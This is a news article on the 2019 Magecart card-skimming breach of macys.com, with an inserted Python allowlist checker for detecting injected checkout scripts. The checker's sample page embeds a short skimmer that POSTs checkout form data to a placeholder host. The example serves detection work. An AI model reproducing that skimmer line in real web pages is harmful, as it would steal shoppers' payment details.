On November 14, 2019, US retail giant Macy’s announced that it had suffered a data breach. The breach appears to be the result of another Magecart attack, with Macy’s now added, along with British Airways, to the list of high-profile Magecart victims. In a Magecart attack, the hacker targets the shopping cart feature on an eCommerce website, injecting malicious code into the checkout function so that credit card details entered by customers are skimmed and sent to a command and control server. In the Macy’s incident, malicious code was added to both the checkout and shopping cart pages, which allowed the hacker to steal even more customer information.
According to the announcement, the checkout and cart pages were compromised on October 7, with the hack only being detected on October 15. This means that for a week any details entered on the compromised pages could have been collected by the hacker. The attackers in this instance were able to access customer and credit card information including the customer's first name, last name, address, city, state, zip, phone number, email address, payment card number, CVV number, and card expiration details. The retail giant noted,
“On October 15, 2019, we were alerted to a suspicious connection between macys.com and another website. Our security teams immediately began an investigation. Based on our investigation, we believe that on October 7, 2019, an unauthorized third party added unauthorized computer code to two (2) pages on macys.com. The unauthorized code was highly specific and only allowed the third party to capture information submitted by customers on the following two (2) macys.com pages: (1) the checkout page - if credit card data was entered and “place order” button was hit; and (2) the wallet page - accessed through My Account. Our teams successfully removed the unauthorized code on October 15, 2019.”
Macy’s shared further information with Bleeping Computer stating,
“We are aware of a data security incident involving a small number of our customers on Macys.com. We have investigated the matter thoroughly, addressed the cause and have implemented additional security measures as a precaution. All impacted customers have been notified, and we are offering consumer protections to these customers at no cost.”
The added protection offered by Macy’s is the free use of Experian identity protection services. The company further advises all customers to monitor their accounts and report any suspicious transactions or occurrences. The company is working with law enforcement and a yet-to-be-named forensic firm, and has notified Visa, Mastercard, and other credit card operators of the breach. In the same article published recently by Bleeping Computer, an anonymous source shared the obfuscated malicious code. The code reveals that when the hacker compromised the Macy's website, they altered an existing script to include an obfuscated Magecart script. Once a customer submitted their payment information, this script would run and send the submitted information to a command and control server at Barn-x.com/api/analysis.php.
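The skimmer described above betrays itself by sending form data to a host the site has no business talking to. The check below, an added example that is not code from the article or from Macy's, compares every host referenced by a checkout page's scripts against an allowlist of expected origins; the sample page, the allowlist and the exfiltration host in it are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Constructed sample checkout page: one legitimate script, plus an injected
# skimmer that posts the order form to an unknown host when "place order"
# is clicked. "exfil.invalid" is a placeholder, not a real indicator.
SAMPLE_PAGE = """
<html><body>
<script src="https://cdn.example-shop.com/checkout.js"></script>
<script>
  document.querySelector('#place-order').addEventListener('click', function () {
    var d = new FormData(document.forms[0]);
    fetch('https://exfil.invalid/api/collect.php', {method: 'POST', body: d});
  });
</script>
</body></html>
"""

# Hosts the shop expects its pages to load scripts from or talk to (assumed).
ALLOWED_HOSTS = {"example-shop.com", "cdn.example-shop.com"}

SCRIPT_SRC_RE = re.compile(r'<script[^>]+src=["\']([^"\']+)["\']', re.I)
# Inline scripts only: <script ...> tags that carry no src attribute.
INLINE_SCRIPT_RE = re.compile(r'<script(?![^>]*\bsrc=)[^>]*>(.*?)</script>', re.I | re.S)
URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.I)


def host_allowed(host, allowed):
    """True if host is an allowlisted origin or a subdomain of one."""
    return any(host == a or host.endswith("." + a) for a in allowed)


def find_unexpected_hosts(html, allowed=ALLOWED_HOSTS):
    """Return the sorted hostnames referenced by the page's scripts (external
    script sources and absolute URLs inside inline scripts) that are not on
    the allowlist. Any result is a candidate skimmer endpoint to investigate."""
    found = set()
    for src in SCRIPT_SRC_RE.findall(html):
        found.add(urlparse(src).hostname or "")
    for body in INLINE_SCRIPT_RE.findall(html):
        for url in URL_RE.findall(body):
            found.add(urlparse(url).hostname or "")
    return sorted(h for h in found if h and not host_allowed(h, allowed))


if __name__ == "__main__":
    print(find_unexpected_hosts(SAMPLE_PAGE))  # ['exfil.invalid']
```

Running the same comparison on a periodic fetch of the live checkout page, and alerting when the result is non-empty, catches an injected script on the day it appears rather than a week later.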
Not the First Time
This is not the first breach suffered by Macy’s. In July 2018, news reports began emerging that the company had suffered a data breach. It was revealed that the hackers managed to steal customer names and credit card numbers, expiration dates, and security numbers. At the time it was estimated that the breach affected 0.5% of the online customer base of Macy’s and its sister company Bloomingdale's. In this instance, the compromise began in late April and may have run to the middle of June. Macy’s again provided customer protection services free of charge. However, this was not enough to stop some affected customers from seeking legal restitution.
A class-action suit was opened against Macy’s shortly after customers were notified of the breach. Before the courts could decide on the matter, Macy’s reached a settlement deal with customers of over 250,000 USD. Court cases such as these show the added, often unexpected, costs associated with data breaches. For smaller companies reliant on online trade, such breaches can ultimately result in bankruptcy. Any online trader should make a concerted effort to follow all legislation regarding their responsibilities in handling consumer data, particularly any data that contains personally identifiable information.
It is not only companies that can protect data; consumers can also help in the fight. Shopping at online stores that require further authentication is strongly advised. Services like Apple Pay can also be used, as they require the input of a generated code to complete a purchase. Customers can also use the services of credit unions to monitor whether any accounts have been opened in their name without their knowledge. Recently the US revenue service, the IRS, published advice to help keep consumers protected during the upcoming holiday season and the Black Friday rush. The IRS advises people to:
- Use security software for computers and mobile phones – and keep it updated.
- Protect personal information; don't hand it out to just anyone.
- Use strong and unique passwords for all accounts.
- Use two-factor authentication whenever possible.
- Shop only at secure websites; look for the "https" in web addresses; avoid shopping on unsecured and public WiFi in places like shopping malls.
- Routinely back up files on computers and mobile phones.
With Magecart attacks, there is a tendency to blame the operators of the website for not keeping proper tabs on their security. While this is true in a lot of cases, the reality of cybersecurity is that both the supplier and the end-user can take steps to prevent attacks. Making use of more secure options when paying for items online should not be seen as a chore but a necessity.